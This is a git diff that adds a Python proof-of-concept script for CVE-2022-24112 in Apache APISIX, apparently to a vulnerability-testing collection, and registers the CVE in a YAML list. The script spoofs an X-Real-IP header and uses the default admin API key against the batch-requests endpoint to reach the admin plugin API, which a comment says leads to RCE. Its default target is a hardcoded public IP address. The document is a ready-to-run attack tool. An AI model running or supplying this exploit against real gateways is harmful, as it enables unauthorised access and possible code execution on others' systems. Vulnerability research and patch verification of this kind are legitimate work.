diff --git a/cve/apache-APISIX/CVE-2022-24112.py b/cve/apache-APISIX/CVE-2022-24112.py new file mode 100644 index 0000000000000000000000000000000000000000..47aecefb71de28c1d55bb8cbca8de6465b6ea58d --- /dev/null +++ b/cve/apache-APISIX/CVE-2022-24112.py @@ -0,0 +1,37 @@ +import requests +from secrets import token_hex +import argparse +# Apache APISIX 存在改写 X-REAL-IP header 的风险公告(CVE-2022-24112),利用batch-requests插件 可以RCE + +# get poc from biu ~ + +def poc(host, port=443): + scheme = 'https' if '443' in str(port) else 'http' + target = '{}://{}:{}'.format(scheme, host, port) + token = token_hex(10) + uris = ['/apisix/batch-requests', '/api-gw/batch'] + hits = [f'failed to load plugin {token}'] + data = {"headers": {'X-API-KEY': 'edd1c9f034335f136f87ad84b625c8f1', 'X-Real-IP': '127.0.0.1'}, + 'pipeline': [{'path': f'/apisix/admin/plugins/{token}'}]} + + try: + targets = ['{}{}'.format(target, uri) for uri in uris] + with requests.Session() as session: + for target in targets: + response = session.post(target, timeout=10, json=data, verify=False, proxies={'http': "http://127.0.0.1:8080"}) + for hit in hits: + if hit in response.text: + output = response.json() + + return True, host, target, output + except Exception as error: + return False + return False +''' +''' +parser = argparse.ArgumentParser(description='test') +parser.add_argument('--ip', type=str, nargs='?', default='183.66.101.103', help='IP地址') +parser.add_argument('--port', type=int, nargs='?', default=9080, help='端口') +args = parser.parse_args() +print (poc(host=args.ip, port=args.port)) + diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 323454b7beb22c218ff26e79627829ece37c6ab0..6494fa06c8cc24cdc50c481eb31c438cb23943ce 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -4,6 +4,8 @@ cve: - CVE-2020-9490 - CVE-2021-41773 - CVE-2021-42013 + apache-APISIX: + - CVE-2022-24112 linux-kernel: - CVE-2021-4204 - CVE-2021-22555